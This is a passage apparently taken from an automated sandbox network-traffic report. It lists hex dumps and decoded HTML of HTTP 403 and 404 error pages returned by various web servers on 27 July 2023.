26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:33 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.2.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:34 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Thu, 27 Jul 2023 19:53:34 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Thu, 27 Jul 2023 19:53:49 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rW2N%2BQq1%2BQNsy87wo4MchFpOOFPQOH%2F%2FQcGWu7QGFNJjadLieUVEEyhdyP1MgjxvnDHR3xwJbVJYIDHj07OryOd%2B%2Fji53uwh044SoDdy4OCtXKswTJpEB2Uwa0L8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76de69a072be4-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 Data Ascii: 119f<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Conte
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Thu, 27 Jul 2023 19:53:34 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: iAP3VhbO/Rfau5Sm5Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:34 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.2.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 27 Jul 2023 19:53:35 GMTContent-Type: text/htmlContent-Length: 125Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:53:35 GMTServer: ApacheContent-Length: 13Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:35 GMTServer: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_uploader/3.2.0Content-Length: 202Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /on this server.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:35 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 7ed76dee7d4cbb3d-FRAalt-svc: h3=":443"; ma=86400Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
